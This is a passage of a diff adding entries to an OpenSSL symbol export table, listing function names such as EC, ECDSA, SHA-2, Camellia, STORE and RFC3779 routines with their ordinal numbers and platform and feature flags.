+STORE_list_certificate_next             3487	NOEXIST::FUNCTION:
+ASN1_generate_nconf                     3488	EXIST::FUNCTION:
+BUF_memdup                              3489	EXIST::FUNCTION:
+BN_GF2m_mod_mul                         3490	EXIST::FUNCTION:EC2M
+STORE_meth_get_list_next_fn             3491	NOEXIST::FUNCTION:
+STORE_method_get_list_next_function     3491	NOEXIST::FUNCTION:
+STORE_ATTR_INFO_get0_dn                 3492	NOEXIST::FUNCTION:
+STORE_list_private_key_next             3493	NOEXIST::FUNCTION:
+EC_GROUP_set_seed                       3494	EXIST::FUNCTION:EC
+X509_VERIFY_PARAM_set_trust             3495	EXIST::FUNCTION:
+STORE_ATTR_INFO_free                    3496	NOEXIST::FUNCTION:
+STORE_get_private_key                   3497	NOEXIST::FUNCTION:
+EVP_PKEY_get_attr_count                 3498	EXIST::FUNCTION:
+STORE_ATTR_INFO_new                     3499	NOEXIST::FUNCTION:
+EC_GROUP_get_curve_GF2m                 3500	EXIST::FUNCTION:EC,EC2M
+STORE_meth_set_revoke_fn                3501	NOEXIST::FUNCTION:
+STORE_method_set_revoke_function        3501	NOEXIST::FUNCTION:
+STORE_store_number                      3502	NOEXIST::FUNCTION:
+BN_is_prime_ex                          3503	EXIST::FUNCTION:
+STORE_revoke_public_key                 3504	NOEXIST::FUNCTION:
+X509_STORE_CTX_get0_param               3505	EXIST::FUNCTION:
+STORE_delete_arbitrary                  3506	NOEXIST::FUNCTION:
+PEM_read_X509_CERT_PAIR                 3507	EXIST:!WIN16:FUNCTION:
+X509_STORE_set_depth                    3508	EXIST::FUNCTION:
+ECDSA_get_ex_data                       3509	EXIST::FUNCTION:ECDSA
+SHA224                                  3510	EXIST::FUNCTION:SHA,SHA256
+BIO_dump_indent_fp                      3511	EXIST::FUNCTION:FP_API
+EC_KEY_set_group                        3512	EXIST::FUNCTION:EC
+BUF_strndup                             3513	EXIST::FUNCTION:
+STORE_list_certificate_start            3514	NOEXIST::FUNCTION:
+BN_GF2m_mod                             3515	EXIST::FUNCTION:EC2M
+X509_REQ_check_private_key              3516	EXIST::FUNCTION:
+EC_GROUP_get_seed_len                   3517	EXIST::FUNCTION:EC
+ERR_load_STORE_strings                  3518	NOEXIST::FUNCTION:
+PEM_read_bio_EC_PUBKEY                  3519	EXIST::FUNCTION:EC
+STORE_list_private_key_end              3520	NOEXIST::FUNCTION:
+i2d_EC_PUBKEY                           3521	EXIST::FUNCTION:EC
+ECDSA_get_default_method                3522	EXIST::FUNCTION:ECDSA
+ASN1_put_eoc                            3523	EXIST::FUNCTION:
+X509_STORE_CTX_get_explicit_policy      3524	EXIST:!VMS:FUNCTION:
+X509_STORE_CTX_get_expl_policy          3524	EXIST:VMS:FUNCTION:
+X509_VERIFY_PARAM_table_cleanup         3525	EXIST::FUNCTION:
+STORE_modify_private_key                3526	NOEXIST::FUNCTION:
+X509_VERIFY_PARAM_free                  3527	EXIST::FUNCTION:
+EC_METHOD_get_field_type                3528	EXIST::FUNCTION:EC
+EC_GFp_nist_method                      3529	EXIST::FUNCTION:EC
+STORE_meth_set_modify_fn                3530	NOEXIST::FUNCTION:
+STORE_method_set_modify_function        3530	NOEXIST::FUNCTION:
+STORE_parse_attrs_next                  3531	NOEXIST::FUNCTION:
+ENGINE_load_padlock                     3532	EXIST::FUNCTION:ENGINE,STATIC_ENGINE
+EC_GROUP_set_curve_name                 3533	EXIST::FUNCTION:EC
+X509_CERT_PAIR_it                       3534	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+X509_CERT_PAIR_it                       3534	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+STORE_meth_get_revoke_fn                3535	NOEXIST::FUNCTION:
+STORE_method_get_revoke_function        3535	NOEXIST::FUNCTION:
+STORE_method_set_get_function           3536	NOEXIST::FUNCTION:
+STORE_modify_number                     3537	NOEXIST::FUNCTION:
+STORE_method_get_store_function         3538	NOEXIST::FUNCTION:
+STORE_store_private_key                 3539	NOEXIST::FUNCTION:
+BN_GF2m_mod_sqr_arr                     3540	EXIST::FUNCTION:EC2M
+RSA_setup_blinding                      3541	EXIST::FUNCTION:RSA
+BIO_s_datagram                          3542	EXIST::FUNCTION:DGRAM
+STORE_Memory                            3543	NOEXIST::FUNCTION:
+sk_find_ex                              3544	EXIST::FUNCTION:
+EC_GROUP_set_curve_GF2m                 3545	EXIST::FUNCTION:EC,EC2M
+ENGINE_set_default_ECDSA                3546	EXIST::FUNCTION:ENGINE
+POLICY_CONSTRAINTS_new                  3547	EXIST::FUNCTION:
+BN_GF2m_mod_sqrt                        3548	EXIST::FUNCTION:EC2M
+ECDH_set_default_method                 3549	EXIST::FUNCTION:ECDH
+EC_KEY_generate_key                     3550	EXIST::FUNCTION:EC
+SHA384_Update                           3551	EXIST:!VMSVAX:FUNCTION:SHA,SHA512
+BN_GF2m_arr2poly                        3552	EXIST::FUNCTION:EC2M
+STORE_method_get_get_function           3553	NOEXIST::FUNCTION:
+STORE_meth_set_cleanup_fn               3554	NOEXIST::FUNCTION:
+STORE_method_set_cleanup_function       3554	NOEXIST::FUNCTION:
+EC_GROUP_check                          3555	EXIST::FUNCTION:EC
+d2i_ECPrivateKey_bio                    3556	EXIST::FUNCTION:BIO,EC
+EC_KEY_insert_key_method_data           3557	EXIST::FUNCTION:EC
+STORE_meth_get_lock_store_fn            3558	NOEXIST::FUNCTION:
+STORE_method_get_lock_store_function    3558	NOEXIST::FUNCTION:
+X509_VERIFY_PARAM_get_depth             3559	EXIST::FUNCTION:
+SHA224_Final                            3560	EXIST::FUNCTION:SHA,SHA256
+STORE_meth_set_update_store_fn          3561	NOEXIST::FUNCTION:
+STORE_method_set_update_store_function  3561	NOEXIST::FUNCTION:
+SHA224_Update                           3562	EXIST::FUNCTION:SHA,SHA256
+d2i_ECPrivateKey                        3563	EXIST::FUNCTION:EC
+ASN1_item_ndef_i2d                      3564	EXIST::FUNCTION:
+STORE_delete_private_key                3565	NOEXIST::FUNCTION:
+ERR_pop_to_mark                         3566	EXIST::FUNCTION:
+ENGINE_register_all_STORE               3567	EXIST::FUNCTION:ENGINE
+X509_policy_level_get0_node             3568	EXIST::FUNCTION:
+i2d_PKCS7_NDEF                          3569	EXIST::FUNCTION:
+EC_GROUP_get_degree                     3570	EXIST::FUNCTION:EC
+ASN1_generate_v3                        3571	EXIST::FUNCTION:
+STORE_ATTR_INFO_modify_cstr             3572	NOEXIST::FUNCTION:
+X509_policy_tree_level_count            3573	EXIST::FUNCTION:
+BN_GF2m_add                             3574	EXIST::FUNCTION:EC2M
+EC_KEY_get0_group                       3575	EXIST::FUNCTION:EC
+STORE_generate_crl                      3576	NOEXIST::FUNCTION:
+STORE_store_public_key                  3577	NOEXIST::FUNCTION:
+X509_CERT_PAIR_free                     3578	EXIST::FUNCTION:
+STORE_revoke_private_key                3579	NOEXIST::FUNCTION:
+BN_nist_mod_224                         3580	EXIST::FUNCTION:
+SHA512_Final                            3581	EXIST:!VMSVAX:FUNCTION:SHA,SHA512
+STORE_ATTR_INFO_modify_dn               3582	NOEXIST::FUNCTION:
+STORE_meth_get_initialise_fn            3583	NOEXIST::FUNCTION:
+STORE_method_get_initialise_function    3583	NOEXIST::FUNCTION:
+STORE_delete_number                     3584	NOEXIST::FUNCTION:
+i2d_EC_PUBKEY_bio                       3585	EXIST::FUNCTION:BIO,EC
+BIO_dgram_non_fatal_error               3586	EXIST::FUNCTION:
+EC_GROUP_get_asn1_flag                  3587	EXIST::FUNCTION:EC
+STORE_ATTR_INFO_in_ex                   3588	NOEXIST::FUNCTION:
+STORE_list_crl_start                    3589	NOEXIST::FUNCTION:
+ECDH_get_ex_new_index                   3590	EXIST::FUNCTION:ECDH
+STORE_meth_get_modify_fn                3591	NOEXIST::FUNCTION:
+STORE_method_get_modify_function        3591	NOEXIST::FUNCTION:
+v2i_ASN1_BIT_STRING                     3592	EXIST::FUNCTION:
+STORE_store_certificate                 3593	NOEXIST::FUNCTION:
+OBJ_bsearch_ex                          3594	NOEXIST::FUNCTION:
+X509_STORE_CTX_set_default              3595	EXIST::FUNCTION:
+STORE_ATTR_INFO_set_sha1str             3596	NOEXIST::FUNCTION:
+BN_GF2m_mod_inv                         3597	EXIST::FUNCTION:EC2M
+BN_GF2m_mod_exp                         3598	EXIST::FUNCTION:EC2M
+STORE_modify_public_key                 3599	NOEXIST::FUNCTION:
+STORE_meth_get_list_start_fn            3600	NOEXIST::FUNCTION:
+STORE_method_get_list_start_function    3600	NOEXIST::FUNCTION:
+EC_GROUP_get0_seed                      3601	EXIST::FUNCTION:EC
+STORE_store_arbitrary                   3602	NOEXIST::FUNCTION:
+STORE_meth_set_unlock_store_fn          3603	NOEXIST::FUNCTION:
+STORE_method_set_unlock_store_function  3603	NOEXIST::FUNCTION:
+BN_GF2m_mod_div_arr                     3604	EXIST::FUNCTION:EC2M
+ENGINE_set_ECDSA                        3605	EXIST::FUNCTION:ENGINE
+STORE_create_method                     3606	NOEXIST::FUNCTION:
+ECPKParameters_print                    3607	EXIST::FUNCTION:BIO,EC
+EC_KEY_get0_private_key                 3608	EXIST::FUNCTION:EC
+PEM_write_EC_PUBKEY                     3609	EXIST:!WIN16:FUNCTION:EC
+X509_VERIFY_PARAM_set1                  3610	EXIST::FUNCTION:
+ECDH_set_method                         3611	EXIST::FUNCTION:ECDH
+v2i_GENERAL_NAME_ex                     3612	EXIST::FUNCTION:
+ECDH_set_ex_data                        3613	EXIST::FUNCTION:ECDH
+STORE_generate_key                      3614	NOEXIST::FUNCTION:
+BN_nist_mod_521                         3615	EXIST::FUNCTION:
+X509_policy_tree_get0_level             3616	EXIST::FUNCTION:
+EC_GROUP_set_point_conversion_form      3617	EXIST:!VMS:FUNCTION:EC
+EC_GROUP_set_point_conv_form            3617	EXIST:VMS:FUNCTION:EC
+PEM_read_EC_PUBKEY                      3618	EXIST:!WIN16:FUNCTION:EC
+i2d_ECDSA_SIG                           3619	EXIST::FUNCTION:ECDSA
+ECDSA_OpenSSL                           3620	EXIST::FUNCTION:ECDSA
+STORE_delete_crl                        3621	NOEXIST::FUNCTION:
+EC_KEY_get_enc_flags                    3622	EXIST::FUNCTION:EC
+ASN1_const_check_infinite_end           3623	EXIST::FUNCTION:
+EVP_PKEY_delete_attr                    3624	EXIST::FUNCTION:
+ECDSA_set_default_method                3625	EXIST::FUNCTION:ECDSA
+EC_POINT_set_compressed_coordinates_GF2m 3626	EXIST:!VMS:FUNCTION:EC,EC2M
+EC_POINT_set_compr_coords_GF2m          3626	EXIST:VMS:FUNCTION:EC,EC2M
+EC_GROUP_cmp                            3627	EXIST::FUNCTION:EC
+STORE_revoke_certificate                3628	NOEXIST::FUNCTION:
+BN_get0_nist_prime_256                  3629	EXIST::FUNCTION:
+STORE_meth_get_delete_fn                3630	NOEXIST::FUNCTION:
+STORE_method_get_delete_function        3630	NOEXIST::FUNCTION:
+SHA224_Init                             3631	EXIST::FUNCTION:SHA,SHA256
+PEM_read_ECPrivateKey                   3632	EXIST:!WIN16:FUNCTION:EC
+SHA512_Init                             3633	EXIST:!VMSVAX:FUNCTION:SHA,SHA512
+STORE_parse_attrs_endp                  3634	NOEXIST::FUNCTION:
+BN_set_negative                         3635	EXIST::FUNCTION:
+ERR_load_ECDSA_strings                  3636	EXIST::FUNCTION:ECDSA
+EC_GROUP_get_basis_type                 3637	EXIST::FUNCTION:EC
+STORE_list_public_key_next              3638	NOEXIST::FUNCTION:
+i2v_ASN1_BIT_STRING                     3639	EXIST::FUNCTION:
+STORE_OBJECT_free                       3640	NOEXIST::FUNCTION:
+BN_nist_mod_384                         3641	EXIST::FUNCTION:
+i2d_X509_CERT_PAIR                      3642	EXIST::FUNCTION:
+PEM_write_ECPKParameters                3643	EXIST:!WIN16:FUNCTION:EC
+ECDH_compute_key                        3644	EXIST::FUNCTION:ECDH
+STORE_ATTR_INFO_get0_sha1str            3645	NOEXIST::FUNCTION:
+ENGINE_register_all_ECDH                3646	EXIST::FUNCTION:ENGINE
+pqueue_pop                              3647	EXIST::FUNCTION:
+STORE_ATTR_INFO_get0_cstr               3648	NOEXIST::FUNCTION:
+POLICY_CONSTRAINTS_it                   3649	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+POLICY_CONSTRAINTS_it                   3649	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+STORE_get_ex_new_index                  3650	NOEXIST::FUNCTION:
+EVP_PKEY_get_attr_by_OBJ                3651	EXIST::FUNCTION:
+X509_VERIFY_PARAM_add0_policy           3652	EXIST::FUNCTION:
+BN_GF2m_mod_solve_quad                  3653	EXIST::FUNCTION:EC2M
+SHA256                                  3654	EXIST::FUNCTION:SHA,SHA256
+i2d_ECPrivateKey_fp                     3655	EXIST::FUNCTION:EC,FP_API
+X509_policy_tree_get0_user_policies     3656	EXIST:!VMS:FUNCTION:
+X509_pcy_tree_get0_usr_policies         3656	EXIST:VMS:FUNCTION:
+OPENSSL_DIR_read                        3657	EXIST::FUNCTION:
+ENGINE_register_all_ECDSA               3658	EXIST::FUNCTION:ENGINE
+X509_VERIFY_PARAM_lookup                3659	EXIST::FUNCTION:
+EC_POINT_get_affine_coordinates_GF2m    3660	EXIST:!VMS:FUNCTION:EC,EC2M
+EC_POINT_get_affine_coords_GF2m         3660	EXIST:VMS:FUNCTION:EC,EC2M
+EC_GROUP_dup                            3661	EXIST::FUNCTION:EC
+ENGINE_get_default_ECDSA                3662	EXIST::FUNCTION:ENGINE
+EC_KEY_new                              3663	EXIST::FUNCTION:EC
+SHA256_Transform                        3664	EXIST::FUNCTION:SHA,SHA256
+EC_KEY_set_enc_flags                    3665	EXIST::FUNCTION:EC
+ECDSA_verify                            3666	EXIST::FUNCTION:ECDSA
+EC_POINT_point2hex                      3667	EXIST::FUNCTION:EC
+ENGINE_get_STORE                        3668	EXIST::FUNCTION:ENGINE
+SHA512                                  3669	EXIST:!VMSVAX:FUNCTION:SHA,SHA512
+STORE_get_certificate                   3670	NOEXIST::FUNCTION:
+ECDSA_do_sign_ex                        3671	EXIST::FUNCTION:ECDSA
+ECDSA_do_verify                         3672	EXIST::FUNCTION:ECDSA
+d2i_ECPrivateKey_fp                     3673	EXIST::FUNCTION:EC,FP_API
+STORE_delete_certificate                3674	NOEXIST::FUNCTION:
+SHA512_Transform                        3675	EXIST:!VMSVAX:FUNCTION:SHA,SHA512
+X509_STORE_set1_param                   3676	EXIST::FUNCTION:
+STORE_method_get_ctrl_function          3677	NOEXIST::FUNCTION:
+STORE_free                              3678	NOEXIST::FUNCTION:
+PEM_write_ECPrivateKey                  3679	EXIST:!WIN16:FUNCTION:EC
+STORE_meth_get_unlock_store_fn          3680	NOEXIST::FUNCTION:
+STORE_method_get_unlock_store_function  3680	NOEXIST::FUNCTION:
+STORE_get_ex_data                       3681	NOEXIST::FUNCTION:
+EC_KEY_set_public_key                   3682	EXIST::FUNCTION:EC
+PEM_read_ECPKParameters                 3683	EXIST:!WIN16:FUNCTION:EC
+X509_CERT_PAIR_new                      3684	EXIST::FUNCTION:
+ENGINE_register_STORE                   3685	EXIST::FUNCTION:ENGINE
+RSA_generate_key_ex                     3686	EXIST::FUNCTION:RSA
+DSA_generate_parameters_ex              3687	EXIST::FUNCTION:DSA
+ECParameters_print_fp                   3688	EXIST::FUNCTION:EC,FP_API
+X509V3_NAME_from_section                3689	EXIST::FUNCTION:
+EVP_PKEY_add1_attr                      3690	EXIST::FUNCTION:
+STORE_modify_crl                        3691	NOEXIST::FUNCTION:
+STORE_list_private_key_start            3692	NOEXIST::FUNCTION:
+POLICY_MAPPINGS_it                      3693	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+POLICY_MAPPINGS_it                      3693	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+GENERAL_SUBTREE_it                      3694	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+GENERAL_SUBTREE_it                      3694	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+EC_GROUP_get_curve_name                 3695	EXIST::FUNCTION:EC
+PEM_write_X509_CERT_PAIR                3696	EXIST:!WIN16:FUNCTION:
+BIO_dump_indent_cb                      3697	EXIST::FUNCTION:
+d2i_X509_CERT_PAIR                      3698	EXIST::FUNCTION:
+STORE_list_private_key_endp             3699	NOEXIST::FUNCTION:
+asn1_const_Finish                       3700	EXIST::FUNCTION:
+i2d_EC_PUBKEY_fp                        3701	EXIST::FUNCTION:EC,FP_API
+BN_nist_mod_256                         3702	EXIST::FUNCTION:
+X509_VERIFY_PARAM_add0_table            3703	EXIST::FUNCTION:
+pqueue_free                             3704	EXIST::FUNCTION:
+BN_BLINDING_create_param                3705	EXIST::FUNCTION:
+ECDSA_size                              3706	EXIST::FUNCTION:ECDSA
+d2i_EC_PUBKEY_bio                       3707	EXIST::FUNCTION:BIO,EC
+BN_get0_nist_prime_521                  3708	EXIST::FUNCTION:
+STORE_ATTR_INFO_modify_sha1str          3709	NOEXIST::FUNCTION:
+BN_generate_prime_ex                    3710	EXIST::FUNCTION:
+EC_GROUP_new_by_curve_name              3711	EXIST::FUNCTION:EC
+SHA256_Final                            3712	EXIST::FUNCTION:SHA,SHA256
+DH_generate_parameters_ex               3713	EXIST::FUNCTION:DH
+PEM_read_bio_ECPrivateKey               3714	EXIST::FUNCTION:EC
+STORE_meth_get_cleanup_fn               3715	NOEXIST::FUNCTION:
+STORE_method_get_cleanup_function       3715	NOEXIST::FUNCTION:
+ENGINE_get_ECDH                         3716	EXIST::FUNCTION:ENGINE
+d2i_ECDSA_SIG                           3717	EXIST::FUNCTION:ECDSA
+BN_is_prime_fasttest_ex                 3718	EXIST::FUNCTION:
+ECDSA_sign                              3719	EXIST::FUNCTION:ECDSA
+X509_policy_check                       3720	EXIST::FUNCTION:
+EVP_PKEY_get_attr_by_NID                3721	EXIST::FUNCTION:
+STORE_set_ex_data                       3722	NOEXIST::FUNCTION:
+ENGINE_get_ECDSA                        3723	EXIST::FUNCTION:ENGINE
+EVP_ecdsa                               3724	EXIST::FUNCTION:SHA
+BN_BLINDING_get_flags                   3725	EXIST::FUNCTION:
+PKCS12_add_cert                         3726	EXIST::FUNCTION:
+STORE_OBJECT_new                        3727	NOEXIST::FUNCTION:
+ERR_load_ECDH_strings                   3728	EXIST::FUNCTION:ECDH
+EC_KEY_dup                              3729	EXIST::FUNCTION:EC
+EVP_CIPHER_CTX_rand_key                 3730	EXIST::FUNCTION:
+ECDSA_set_method                        3731	EXIST::FUNCTION:ECDSA
+a2i_IPADDRESS_NC                        3732	EXIST::FUNCTION:
+d2i_ECParameters                        3733	EXIST::FUNCTION:EC
+STORE_list_certificate_end              3734	NOEXIST::FUNCTION:
+STORE_get_crl                           3735	NOEXIST::FUNCTION:
+X509_POLICY_NODE_print                  3736	EXIST::FUNCTION:
+SHA384_Init                             3737	EXIST:!VMSVAX:FUNCTION:SHA,SHA512
+EC_GF2m_simple_method                   3738	EXIST::FUNCTION:EC,EC2M
+ECDSA_set_ex_data                       3739	EXIST::FUNCTION:ECDSA
+SHA384_Final                            3740	EXIST:!VMSVAX:FUNCTION:SHA,SHA512
+PKCS7_set_digest                        3741	EXIST::FUNCTION:
+EC_KEY_print                            3742	EXIST::FUNCTION:BIO,EC
+STORE_meth_set_lock_store_fn            3743	NOEXIST::FUNCTION:
+STORE_method_set_lock_store_function    3743	NOEXIST::FUNCTION:
+ECDSA_get_ex_new_index                  3744	EXIST::FUNCTION:ECDSA
+SHA384                                  3745	EXIST:!VMSVAX:FUNCTION:SHA,SHA512
+POLICY_MAPPING_new                      3746	EXIST::FUNCTION:
+STORE_list_certificate_endp             3747	NOEXIST::FUNCTION:
+X509_STORE_CTX_get0_policy_tree         3748	EXIST::FUNCTION:
+EC_GROUP_set_asn1_flag                  3749	EXIST::FUNCTION:EC
+EC_KEY_check_key                        3750	EXIST::FUNCTION:EC
+d2i_EC_PUBKEY_fp                        3751	EXIST::FUNCTION:EC,FP_API
+PKCS7_set0_type_other                   3752	EXIST::FUNCTION:
+PEM_read_bio_X509_CERT_PAIR             3753	EXIST::FUNCTION:
+pqueue_next                             3754	EXIST::FUNCTION:
+STORE_meth_get_list_end_fn              3755	NOEXIST::FUNCTION:
+STORE_method_get_list_end_function      3755	NOEXIST::FUNCTION:
+EVP_PKEY_add1_attr_by_OBJ               3756	EXIST::FUNCTION:
+X509_VERIFY_PARAM_set_time              3757	EXIST::FUNCTION:
+pqueue_new                              3758	EXIST::FUNCTION:
+ENGINE_set_default_ECDH                 3759	EXIST::FUNCTION:ENGINE
+STORE_new_method                        3760	NOEXIST::FUNCTION:
+PKCS12_add_key                          3761	EXIST::FUNCTION:
+DSO_merge                               3762	EXIST::FUNCTION:
+EC_POINT_hex2point                      3763	EXIST::FUNCTION:EC
+BIO_dump_cb                             3764	EXIST::FUNCTION:
+SHA256_Update                           3765	EXIST::FUNCTION:SHA,SHA256
+pqueue_insert                           3766	EXIST::FUNCTION:
+pitem_free                              3767	EXIST::FUNCTION:
+BN_GF2m_mod_inv_arr                     3768	EXIST::FUNCTION:EC2M
+ENGINE_unregister_ECDSA                 3769	EXIST::FUNCTION:ENGINE
+BN_BLINDING_set_thread_id               3770	EXIST::FUNCTION:DEPRECATED
+get_rfc3526_prime_8192                  3771	EXIST::FUNCTION:
+X509_VERIFY_PARAM_clear_flags           3772	EXIST::FUNCTION:
+get_rfc2409_prime_1024                  3773	EXIST::FUNCTION:
+DH_check_pub_key                        3774	EXIST::FUNCTION:DH
+get_rfc3526_prime_2048                  3775	EXIST::FUNCTION:
+get_rfc3526_prime_6144                  3776	EXIST::FUNCTION:
+get_rfc3526_prime_1536                  3777	EXIST::FUNCTION:
+get_rfc3526_prime_3072                  3778	EXIST::FUNCTION:
+get_rfc3526_prime_4096                  3779	EXIST::FUNCTION:
+get_rfc2409_prime_768                   3780	EXIST::FUNCTION:
+X509_VERIFY_PARAM_get_flags             3781	EXIST::FUNCTION:
+EVP_CIPHER_CTX_new                      3782	EXIST::FUNCTION:
+EVP_CIPHER_CTX_free                     3783	EXIST::FUNCTION:
+Camellia_cbc_encrypt                    3784	EXIST::FUNCTION:CAMELLIA
+Camellia_cfb128_encrypt                 3785	EXIST::FUNCTION:CAMELLIA
+Camellia_cfb1_encrypt                   3786	EXIST::FUNCTION:CAMELLIA
+Camellia_cfb8_encrypt                   3787	EXIST::FUNCTION:CAMELLIA
+Camellia_ctr128_encrypt                 3788	EXIST::FUNCTION:CAMELLIA
+Camellia_cfbr_encrypt_block             3789	NOEXIST::FUNCTION:
+Camellia_decrypt                        3790	EXIST::FUNCTION:CAMELLIA
+Camellia_ecb_encrypt                    3791	EXIST::FUNCTION:CAMELLIA
+Camellia_encrypt                        3792	EXIST::FUNCTION:CAMELLIA
+Camellia_ofb128_encrypt                 3793	EXIST::FUNCTION:CAMELLIA
+Camellia_set_key                        3794	EXIST::FUNCTION:CAMELLIA
+EVP_camellia_128_cbc                    3795	EXIST::FUNCTION:CAMELLIA
+EVP_camellia_128_cfb128                 3796	EXIST::FUNCTION:CAMELLIA
+EVP_camellia_128_cfb1                   3797	EXIST::FUNCTION:CAMELLIA
+EVP_camellia_128_cfb8                   3798	EXIST::FUNCTION:CAMELLIA
+EVP_camellia_128_ecb                    3799	EXIST::FUNCTION:CAMELLIA
+EVP_camellia_128_ofb                    3800	EXIST::FUNCTION:CAMELLIA
+EVP_camellia_192_cbc                    3801	EXIST::FUNCTION:CAMELLIA
+EVP_camellia_192_cfb128                 3802	EXIST::FUNCTION:CAMELLIA
+EVP_camellia_192_cfb1                   3803	EXIST::FUNCTION:CAMELLIA
+EVP_camellia_192_cfb8                   3804	EXIST::FUNCTION:CAMELLIA
+EVP_camellia_192_ecb                    3805	EXIST::FUNCTION:CAMELLIA
+EVP_camellia_192_ofb                    3806	EXIST::FUNCTION:CAMELLIA
+EVP_camellia_256_cbc                    3807	EXIST::FUNCTION:CAMELLIA
+EVP_camellia_256_cfb128                 3808	EXIST::FUNCTION:CAMELLIA
+EVP_camellia_256_cfb1                   3809	EXIST::FUNCTION:CAMELLIA
+EVP_camellia_256_cfb8                   3810	EXIST::FUNCTION:CAMELLIA
+EVP_camellia_256_ecb                    3811	EXIST::FUNCTION:CAMELLIA
+EVP_camellia_256_ofb                    3812	EXIST::FUNCTION:CAMELLIA
+a2i_ipadd                               3813	EXIST::FUNCTION:
+ASIdentifiers_free                      3814	EXIST::FUNCTION:RFC3779
+i2d_ASIdOrRange                         3815	EXIST::FUNCTION:RFC3779
+EVP_CIPHER_block_size                   3816	EXIST::FUNCTION:
+v3_asid_is_canonical                    3817	EXIST::FUNCTION:RFC3779
+IPAddressChoice_free                    3818	EXIST::FUNCTION:RFC3779
+EVP_CIPHER_CTX_set_app_data             3819	EXIST::FUNCTION:
+BIO_set_callback_arg                    3820	EXIST::FUNCTION:
+v3_addr_add_prefix                      3821	EXIST::FUNCTION:RFC3779
+IPAddressOrRange_it                     3822	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:RFC3779
+IPAddressOrRange_it                     3822	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:RFC3779
+BIO_set_flags                           3823	EXIST::FUNCTION:
+ASIdentifiers_it                        3824	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:RFC3779
+ASIdentifiers_it                        3824	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:RFC3779
+v3_addr_get_range                       3825	EXIST::FUNCTION:RFC3779
+BIO_method_type                         3826	EXIST::FUNCTION:
+v3_addr_inherits                        3827	EXIST::FUNCTION:RFC3779
+IPAddressChoice_it                      3828	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:RFC3779
+IPAddressChoice_it                      3828	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:RFC3779
+AES_ige_encrypt                         3829	EXIST::FUNCTION:AES
+v3_addr_add_range                       3830	EXIST::FUNCTION:RFC3779
+EVP_CIPHER_CTX_nid                      3831	EXIST::FUNCTION:
+d2i_ASRange                             3832	EXIST::FUNCTION:RFC3779
+v3_addr_add_inherit                     3833	EXIST::FUNCTION:RFC3779
+v3_asid_add_id_or_range                 3834	EXIST::FUNCTION:RFC3779
+v3_addr_validate_resource_set           3835	EXIST::FUNCTION:RFC3779
+EVP_CIPHER_iv_length                    3836	EXIST::FUNCTION:
+EVP_MD_type                             3837	EXIST::FUNCTION:
+v3_asid_canonize                        3838	EXIST::FUNCTION:RFC3779
+IPAddressRange_free                     3839	EXIST::FUNCTION:RFC3779
+v3_asid_add_inherit                     3840	EXIST::FUNCTION:RFC3779
+EVP_CIPHER_CTX_key_length               3841	EXIST::FUNCTION:
+IPAddressRange_new                      3842	EXIST::FUNCTION:RFC3779
+ASIdOrRange_new                         3843	EXIST::FUNCTION:RFC3779
+EVP_MD_size                             3844	EXIST::FUNCTION:
+EVP_MD_CTX_test_flags                   3845	EXIST::FUNCTION:
+BIO_clear_flags                         3846	EXIST::FUNCTION:
+i2d_ASRange                             3847	EXIST::FUNCTION:RFC3779
+IPAddressRange_it                       3848	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:RFC3779
+IPAddressRange_it                       3848	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:RFC3779
+IPAddressChoice_new                     3849	EXIST::FUNCTION:RFC3779
+ASIdentifierChoice_new                  3850	EXIST::FUNCTION:RFC3779
+ASRange_free                            3851	EXIST::FUNCTION:RFC3779
+EVP_MD_pkey_type                        3852	EXIST::FUNCTION:
+EVP_MD_CTX_clear_flags                  3853	EXIST::FUNCTION:
+IPAddressFamily_free                    3854	EXIST::FUNCTION:RFC3779
+i2d_IPAddressFamily                     3855	EXIST::FUNCTION:RFC3779
+IPAddressOrRange_new                    3856	EXIST::FUNCTION:RFC3779
+EVP_CIPHER_flags                        3857	EXIST::FUNCTION:
+v3_asid_validate_resource_set           3858	EXIST::FUNCTION:RFC3779
+d2i_IPAddressRange                      3859	EXIST::FUNCTION:RFC3779
+AES_bi_ige_encrypt                      3860	EXIST::FUNCTION:AES
+BIO_get_callback                        3861	EXIST::FUNCTION:
+IPAddressOrRange_free                   3862	EXIST::FUNCTION:RFC3779
+v3_addr_subset                          3863	EXIST::FUNCTION:RFC3779
+d2i_IPAddressFamily                     3864	EXIST::FUNCTION:RFC3779
+v3_asid_subset                          3865	EXIST::FUNCTION:RFC3779
+BIO_test_flags                          3866	EXIST::FUNCTION:
+i2d_ASIdentifierChoice                  3867	EXIST::FUNCTION:RFC3779
+ASRange_it                              3868	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:RFC3779
+ASRange_it                              3868	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:RFC3779
+d2i_ASIdentifiers                       3869	EXIST::FUNCTION:RFC3779
+ASRange_new                             3870	EXIST::FUNCTION:RFC3779
+d2i_IPAddressChoice                     3871	EXIST::FUNCTION:RFC3779
+v3_addr_get_afi                         3872	EXIST::FUNCTION:RFC3779
+EVP_CIPHER_key_length                   3873	EXIST::FUNCTION:
+EVP_Cipher                              3874	EXIST::FUNCTION:
+i2d_IPAddressOrRange                    3875	EXIST::FUNCTION:RFC3779
+ASIdOrRange_it                          3876	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:RFC3779
+ASIdOrRange_it                          3876	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:RFC3779
+EVP_CIPHER_nid                          3877	EXIST::FUNCTION:
+i2d_IPAddressChoice                     3878	EXIST::FUNCTION:RFC3779
+EVP_CIPHER_CTX_block_size               3879	EXIST::FUNCTION:
+ASIdentifiers_new                       3880	EXIST::FUNCTION:RFC3779
+v3_addr_validate_path                   3881	EXIST::FUNCTION:RFC3779
